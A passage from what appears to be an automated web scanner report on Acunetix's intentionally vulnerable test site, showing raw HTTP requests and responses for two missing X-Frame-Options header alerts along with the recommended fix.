href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>Parameter X-Frame-OptionsSolution Most modern Web browsers support the X-Frame-Options HTTP header. Ensure it's set on all web pages returned by your site (if you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET) then you'll want to use SAMEORIGIN, otherwise if you never expect the page to be framed, you should use DENY. Alternatively consider implementing Content Security Policy's "frame-ancestors" directive.
POST http://testaspnet.vulnweb.com/default.aspx
Alert tags Alert description X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks.
Request Request line and header section (388 bytes)
POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com Content-Length: 1025 Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232Request body (1025 bytes)
__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8%2F4bzlRmUHIna4LG5&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLpus%2FwCAK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ8DK3Y7%2FBz6vaeG4S8AOaGVC7NUiA%3D%3DResponse Status line and header section (222 bytes)
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Mon, 25 Jul 2022 13:05:19 GMT Content-Length: 12371Response body (12371 bytes)
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit || (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLpus/wCAK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q8DK3Y7/Bz6vaeG4S8AOaGVC7NUiA==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>Parameter X-Frame-OptionsSolution Most modern Web browsers support the X-Frame-Options HTTP header. Ensure it's set on all web pages returned by your site (if you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET) then you'll want to use SAMEORIGIN, otherwise if you never expect the page to be framed, you should use DENY. Alternatively consider implementing Content Security Policy's "frame-ancestors" directive.
POST http://testaspnet.vulnweb.com/login.aspx
Alert tags Alert description X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks.
Request Request line and header section (397 bytes)
POST http://testaspnet.vulnweb.com/login.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com/login.aspx Content-Length: 1197 Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232Request body (1197 bytes)
__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTIyMzk2OTgxMQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQ9jYlBlcnNpc3RDb29raWVzwbv%2BQ8XadeewSqHhJbH9z4dvJw%3D%3D&__VIEWSTATEGENERATOR=C2EE9ABB&__EVENTVALIDATION=%2FwEWWwLoz%2FfGCgLStq24BwK3jsrkBALtuvfLDQKC3IeGDAK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ8xY%2BHkfERpF5ijDSZsRL1CxlmHEA%3D%3D&tbUsername=ZAP&tbPassword=ZAP&cbPersistCookie=on&btnLogin=LoginResponse Status line and header section (222 bytes)
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Mon, 25 Jul 2022 13:05:19 GMT Content-Length: 13281Response body (13281 bytes)
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>login</title> <meta name="vs_showGrid" content="True"> <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1"> <meta name="CODE_LANGUAGE" Content="C#"> <meta name="vs_defaultClientScript" content="JavaScript"> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="frmLogin" method="post" action="login.aspx" id="frmLogin"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTIyMzk2OTgxMQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQ9jYlBlcnNpc3RDb29raWVzwbv+Q8XadeewSqHhJbH9z4dvJw==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['frmLogin']; if (!theForm) { theForm = document.frmLogin; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit || (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="C2EE9ABB" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWwLoz/fGCgLStq24BwK3jsrkBALtuvfLDQKC3IeGDAK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q8xY+HkfERpF5ijDSZsRL1CxlmHEA==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top" align="center"> <TABLE id="Table2" cellSpacing="0" cellPadding="5" border="0" align="center" class="FramedForm"> <TR> <TD>Username:</TD> <TD align="right"> <input name="tbUsername" type="text" value="ZAP" id="tbUsername" class="Login" /></TD> </TR> <TR> <TD>Password:</TD> <TD align="right"> <input name="tbPassword" type="password" id="tbPassword" class="Login" /></TD> </TR> <TR> <TD align="left" colSpan="2"><input name="cbPersistCookie" type="checkbox" id="cbPersistCookie" checked="checked" class="classic" /> Remember me </TD> </TR> <TR> <TD></TD> <TD align="right"> <input type="submit" name="btnLogin" value="Login" id="btnLogin" /></TD> </TR> </TABLE> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" 